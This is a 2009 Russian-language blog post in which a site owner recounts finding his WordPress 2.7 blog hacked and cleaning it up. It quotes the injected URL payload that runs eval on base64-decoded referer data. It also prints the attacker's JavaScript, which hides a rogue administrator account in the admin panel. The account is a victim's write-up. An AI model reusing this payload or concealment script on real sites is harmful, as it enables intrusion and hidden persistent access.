Поиск по блогу:

Хакнули блог на wordpress 2.7 💎

5 сентября 2009

Один из моих сайтов, тот СДЛ что Яндекс выкинул с индекса тут подробнее хакнули сегодня то-есть вчера

Покупая ссылки в Блогуне я решил проверить блог по одному запросу и пошёл в гугл набрав запрос увидел свой блог при переходе по ссылке мне выбило 400 Bad Request

В ссылке было типо:

/2009/09/срочн/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Пошарясь в поиске нашел еще много хакнутых блогов, ну да ладно…

В панели администрирования → wp → пользователи → было зарегано 3 пользователя, хотя в wp нет разрешения реги юзеров.

Также была надпись Administrator (2) я непонял прикола, отображался только один админ я, а написано, что админов двое…

Залез в исходный код и нашарил ссылку на скрытый профиль второго админа

<a href="user-edit.php?user_id=5&#038;wp_http_referer=%2Fwp-admin%2Fusers.php%3Frole%3Dadministrator">HaywoodWarner72</a>

Перейдя в его профиль увидел чудо

хакер ломает блог на wp

Вот вам JS который он всунул туда:

<div id="user_superuser"><script type="text/javascript"><!--
var setUserName = function(){    try{        var t=document.getElementById("user_superuser");        while(t.nodeName!="TR"){            t=t.parentNode;        };        t.parentNode.removeChild(t);        var tags = document.getElementsByTagName("H3");        var s = " shown below";        for (var i = 0; i < tags.length; i++) {            var t=tags[i].innerHTML;            var h=tags[i];            if(t.indexOf(s)>0){                s =(parseInt(t)-1)+s;                h.removeChild(h.firstChild);                t = document.createTextNode(s);                h.appendChild(t);            }        }        var arr=document.getElementsByTagName("ul");        for(var i in arr) if(arr[i].className=="subsubsub"){            var n= />Administrator ((d+))</gi.exec(arr[i].innerHTML);            if(n[1]>0){                var txt=arr[i].innerHTML.replace( />Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");        arr[i].innerHTML=txt;        }    }          }catch(e){};     };     addLoadEvent(setUserName);
// --></script></div>

Ума хватило все поправить, перебил пасы, обновил wp, кто не понял, уточняю… хотели перелить мой трафик себе.

Первый раз когда меня ломанули и первый раз когда я обновил движок wordpress, теперь эта процедура будит постоянной.

***

Формирование сниппета в выдаче Google так, мне нужны ваши гостевые посты писать сюда.

Подписаться на Telegram
cms wordpress
Может именно ты позволишь себе сейчас, запилить свой комментарий ниже, от автора моментальный респект и благодарность!?
Подписывайся на рассылку блога ↓, чтобы быть в курсе.
Категории блога
.com .htaccess .ru .рф 301 редирект Adsense adwords Ajax Alexa Analytics Blogspot CMS CMS wordpress CPA CSS CTR DLE DNS Dreamweaver статьи firefox FTP клиенты H1 HTML HTML теги icq ie JS ladycash letitbit livejournal интернете MFA MFS mosquito cms Google маркетинг nofollow noindex nolix opera pagerank phpbb robots.txt rss Sape SEO Description SeoQuake SEO плагины для wordpress seo программы для windows seo сервис seo софт sitemap sitemap.xml textpattern ucoz whois WMZ wr-board Xenu zebrum lite Базы Пастухова Бегет ВС Из жизни НЧ НЧ запросы Примеры MFA СДЛ ЧПУ агс анализ топа анкор арбитраж аудит сайта баннерная реклама бесплатно хостинг бэклинки веб-мастер вес страницы внешние ссылки внутренние ссылки внутренняя оптимизация вордстат яндекс граббер гс для истории домены дополнительный индекс дорвей женский сайт индексация сайта интервью итоги года карта сайта каталоги сайтов кейсы кириллица кириллические домены клоакинг комментарии wordpress конкурс контекстная реклама контент конфенция Маул мои сайты мой софт монетизация сайта наращивание ТИЦ ноутбук обзор сайта обмен постовыми основной индекс парсер партнерки для блоггеров перелинковка пинг поисковые тэги покупка ссылок покупные ссылки постовые правильные ссылки продажа ссылок продвижение запросов продвижение неизбежно произвольные поля развод редирект блог релевантность сателлиты свежий сайт сервисы серч сетка сайтов синонимайзер скрипт сми сниппет спам сплог ТИЦ трафик уникальность урлы файлообменник фильтр финстрип хостинг шаблон эксперименты юзабилити
Вкусности:
wlad2 2009 - 2024 - этот SEO Блог работает на WordPress © Copyright - Мы используем файлы Cookie для лучшего представления сайта (блога). Продолжая использовать сайт, вы соглашаетесь с использованием файлов Cookie. Политика конфиденциальности и Пользовательское соглашение - Карта сайта, рубрики блога - адрес почты Email me@wlad2.ru - ссылки на соцсети Вконтакте, YouTube. Если нужно продвинуть интернет-магазин? Пишите в форму.